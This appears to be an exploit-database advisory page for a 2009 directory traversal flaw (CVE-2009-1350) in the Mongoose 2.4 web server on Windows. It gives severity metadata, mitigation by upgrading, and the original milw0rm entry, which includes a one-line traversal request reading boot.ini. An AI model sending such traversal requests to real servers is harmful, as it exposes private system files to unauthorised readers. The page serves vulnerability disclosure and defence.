MonGoose 2.4 (win) webserver Directory Traversal

vendor:

Mongoose

by:

e.wiZz!

7,5

CVSS

HIGH

Directory Traversal

CWE

Product Name: Mongoose

Affected Version From: 2.4

Affected Version To: 2.4

Patch Exists: YES

Related CWE: CVE-2009-1350

CPE: a:mongoose:mongoose:2.4

Metasploit: N/A

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=36103, https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/smb/netidentity_xtierrpcpipe, https://www.infosecmatter.com/nessus-plugin-library/?id=137170, https://www.infosecmatter.com/list-of-metasploit-windows-exploits-detailed-spreadsheet/, https://www.infosecmatter.com/nessus-plugin-library/?id=62580, https://www.infosecmatter.com/nessus-plugin-library/?id=62579, https://www.infosecmatter.com/nessus-plugin-library/?id=57770

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

MonGoose 2.4 (win) webserver Directory Traversal

Mongoose 2.4 (win) webserver is vulnerable to directory traversal. An attacker can exploit this vulnerability to gain access to sensitive files on the server.

Mitigation:

Upgrade to the latest version of Mongoose.

Source

Exploit-DB raw data:

######################### MonGoose 2.4 (win) webserver Directory Traversal  ###################



######By:  e.wiZz!

######Site: www.balcansecurity.com



Found with ServMeNot (world's sexiest fuzzer :P)




In the wild...

#########################################################################################

[Info]: Easy to use web server for Windows and UNIX. Mongoose provides simple and clean API
 for embedding it into existing programs. Targeting Web application developers, embedded system developers,
 and people who need to setup file sharing quickly.

[Site]: http://code.google.com/p/mongoose/


[Vulnerability]:  

http://[localhost]/../../../../../../boot.ini

# milw0rm.com [2009-04-14]